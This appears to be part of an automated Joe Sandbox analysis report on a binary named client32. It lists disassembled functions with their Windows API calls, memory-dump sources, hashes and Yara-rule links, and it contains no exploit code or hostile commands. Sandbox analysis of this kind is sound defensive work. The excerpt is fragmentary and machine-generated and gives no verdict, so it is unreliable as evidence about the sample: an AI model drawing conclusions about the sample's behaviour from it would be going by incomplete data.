                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4250438611-0
                                                                                                                                                                                                    • Opcode ID: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
                                                                                                                                                                                                    • Instruction ID: 661e61dc1211ccd4f13e12e72c8a70072f1f8168924ab5dea67af204b1cc2986
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77F05431640304CECF14EB7889983ACB6E1EB92315F92012ADA229A680E774CC80C746
                                                                                                                                                                                                    Function 685963A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WSACancelBlockingCall.WSOCK32 ref: 685963A9
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 685963B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BlockingCallCancelSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3706969569-0
                                                                                                                                                                                                    • Opcode ID: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
                                                                                                                                                                                                    • Instruction ID: 9c7c155be69afa6d0bd9e6666db90ee95b709ffd67e9b265f4dba9f265acbfe9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80B092782A22A069AF40137109062BA20C80FD5287FE104602B59CA085EF20C504A5A1
                                                                                                                                                                                                    Function 11141510 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
                                                                                                                                                                                                      • Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0072B858,000000FF,?), ref: 11141545
                                                                                                                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0072B858,000000FF,?), ref: 11141555
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3768737497-0
                                                                                                                                                                                                    • Opcode ID: e91e58146c058111e7b7113359dd99c74d9fb6d4d003e3a9145b0d7ba1864261
                                                                                                                                                                                                    • Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e91e58146c058111e7b7113359dd99c74d9fb6d4d003e3a9145b0d7ba1864261
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2
                                                                                                                                                                                                    Function 11010980 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010A34
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3382485803-0
                                                                                                                                                                                                    • Opcode ID: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                                                                                                    • Instruction ID: a25f3913c8117ba577326b804e25134151bce6e6eea091deb2a1df2ca1a14b49
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F516D75A00645DFDB04CF98C980AADBBF6FF89318F24829DD5459B389C776E902CB90
                                                                                                                                                                                                    Function 1113F670 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                                    • Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                                                                                    • Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53
                                                                                                                                                                                                    Function 110F8740 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                                                                    • Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                                                                                    • Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91
                                                                                                                                                                                                    Function 1116C936 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979
                                                                                                                                                                                                      • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                                                    • Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                                                                                    • Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780
                                                                                                                                                                                                    Function 685BA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,685B6F16,00000000,?,685BD40B,00000001,685B6F16,00000000,00000000,00000000,?,685B6F16,00000001,00000214), ref: 685BA0C5
                                                                                                                                                                                                      • Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                                                    • Opcode ID: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
                                                                                                                                                                                                    • Instruction ID: 532255076f6bd0dac442deb89763c6b1f4246476fdcb51f1bb3143e61b06de08
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0501D43130721ADFFB268E65CC74B5B3794EBA13A4F81452AED35EB180DB75D800C640
                                                                                                                                                                                                    Function 11163AB3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __waccess_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4272103461-0
                                                                                                                                                                                                    • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                                                    • Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540
                                                                                                                                                                                                    Function 1116076B Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __fsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3646066109-0
                                                                                                                                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                                                                    • Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
